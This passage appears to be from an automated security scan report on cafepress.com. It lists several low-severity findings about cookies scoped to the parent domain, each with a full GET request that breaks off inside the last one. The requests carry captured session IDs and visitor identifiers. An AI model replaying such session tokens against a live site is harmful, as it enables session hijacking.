ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.9. http://www.cafepress.com/+bags previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.10. http://www.cafepress.com/+boxers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.11. http://www.cafepress.com/+bumper-stickers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.12. http://www.cafepress.com/+buttons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.13. http://www.cafepress.com/+calendars previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.14. http://www.cafepress.com/+clocks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.15. http://www.cafepress.com/+coasters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
